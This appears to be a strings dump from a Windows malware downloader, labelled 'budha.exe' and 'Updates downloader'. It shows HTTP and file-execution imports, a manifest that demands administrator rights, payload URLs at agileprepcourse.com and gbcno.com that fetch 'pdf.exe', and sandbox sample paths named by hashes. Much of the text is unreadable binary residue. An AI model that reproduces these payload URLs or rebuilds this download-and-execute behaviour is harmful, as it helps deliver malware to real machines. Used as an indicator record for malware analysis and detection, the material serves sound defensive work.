L!This program cannot be run in DOS mode.
MV,8,8,8T,8,9,8Z,8Z,8Rich,8
.rdata
@.rsrc
@.reloc
_3^@[SP
SMQuPu
SWSuh1@
SLMA<u
tSSSSh1@
]3ESSj
0EPESS4d1@
^EPEPjWu
VEPjW
3SSSSW
]3SEPEPh
]]EPuV
SMQuEVP
agileprepcourse.com
/scripts/pdf.exe
gbcno.com
/images/emb/pdf.exe
text/*
application/*
RtlDecompressBuffer
InternetOpenW
InternetConnectA
HttpOpenRequestA
InternetQueryOptionW
InternetSetOptionW
HttpSendRequestW
HttpQueryInfoW
InternetReadFile
WININET.dll
GetModuleHandleW
HeapCreate
HeapAlloc
GetModuleFileNameW
GetTempPathW
CreateFileW
GetFileSize
lstrlenW
ExitProcess
ReadFile
lstrcmpW
WriteFile
CloseHandle
DeleteFileW
LoadLibraryW
GetProcAddress
FreeLibrary
HeapFree
GetCurrentDirectoryW
KERNEL32.dll
wsprintfW
USER32.dll
ShellExecuteW
SHELL32.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
10?0L0Z0f0t0y000000000
1<1d1m11111111
2/282_2g22222
3H3333333
464N4U4h4q44444
\1`1d1h1
b u d h a . e x e
U p d a t e s d o w n l o a d e r
n t d l l . d l l
r k i l f . e x e
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ s a m p l e . e x e
C : \ 6 9 2 1 6 a 4 1 7 2 4 1 2 d 0 e 8 f 8 3 d f 8 a 8 9 1 b d c e a 3 8 4 4 3 f 3 b 3 7 9 7 b a 7 2 3 c 5 f 6 7 a c 0 8 e 9 6 3 0 e
C : \ r H c b 7 l g C . e x e
C : \ 1 f 7 0 a a 9 3 c 9 f b 9 8 2 4 1 c 0 c 7 1 4 4 d 5 4 8 2 1 5 a 1 8 b 8 3 8 5 f 5 1 2 7 9 6 1 5 4 5 5 3 9 9 a 1 5 1 e 1 9 6 c 1
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ b u d h a . e x e
C : \ U s e r s \ P e t r a \ A p p D a t a \ L o c a l \ T e m p \ b u d h a . p e 3 2
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ d 6 6 9 3 9 8 3 9 7 0 6 0 f b 2 _ b u d h a . e x e
C : \ c 9 c 5 d 9 1 e 4 e c a 9 8 0 1 e a d 7 3 6 d d f 6 d e 6 8 7 b d 2 2 c f b c 5 d a 8 a 8 2 6 d 0 7 f 9 a 2 f 9 e 9 1 d c e e 4
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ b u d h a . e x e
C : \ 2 c e c a b 3 2 f 4 0 7 d d 8 7 8 2 4 2 b 9 c 9 9 8 e a d 1 2 c 6 0 d e 2 2 1 b 6 8 f 1 6 4 2 a 3 a 4 e 7 c a c 8 3 7 6 9 2 6 3
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ b u d h a . e x e
C : \ U s e r s \ P e t r a \ A p p D a t a \ L o c a l \ T e m p \ b u d h a . p e 3 2
C : \ U s e r s \ P e t r a \ A p p D a t a \ L o c a l \ T e m p \ b u d h a . p e 3 2
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ a 3 f 0 3 a d d c 2 4 5 3 8 e 4 _ b u d h a . e x e
C : \ U s e r s \ P e t r a \ A p p D a t a \ L o c a l \ T e m p \ b u d h a . p e 3 2
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ 5 2 e 1 3 a e 1 f 8 0 9 2 4 9 5 _ b u d h a . e x e
C : \ 2 5 0 3 6 c 5 3 4 a 2 c 0 f 8 8 0 1 b 5 1 e 8 9 5 e 5 f 1 7 a 0 a 5 4 a e 8 a 4 9 a 4 b d 4 a 7 8 b b 8 8 1 3 8 f f 4 3 5 5 5 d
C : \ 1 6 5 3 6 a 1 4 f e f 0 c 2 1 1 6 6 3 d a 5 1 f 8 4 1 6 f 1 3 1 0 a d 4 1 b 8 3 9 4 4 e 0 4 9 9 9 5 5 5 3 4 f 2 f d 0 2 3 d 0 e
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ b u d h a . e x e
C : \ 5 7 d 4 7 1 5 2 0 4 e 2 e c b 5 0 e 3 6 f d a 3 2 0 6 c 4 9 0 e 5 1 a 0 b 0 6 9 2 6 1 2 4 6 9 e b e 8 5 d 5 f 3 6 7 9 6 2 a 7 a
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ b u d h a . e x e
C : \ U s e r s \ V i r t u a l \ A p p D a t a \ L o c a l \ T e m p \ 9 a 3 3 8 4 2 2 b 8 e 5 a 3 4 2 5 6 0 d 3 8 1 7 b 7 2 2 e c 1 7 7 a 7 9 0 6 d 9 1 9 4 8 1 2 0 0 7 8 8 4 f f 2 9 e 3 6 a 1 4 9 e . e x e
C : \ b 7 b 4 c 5 c 5 5 a 5 5 f 3 c c c 5 a 6 2 a f 4 a 0 c 6 1 0 1 8 b d 7 d d 0 8 a 4 2 e b 9 8 f 2 e 6 4 7 8 c 7 d 2 e d 8 a c f f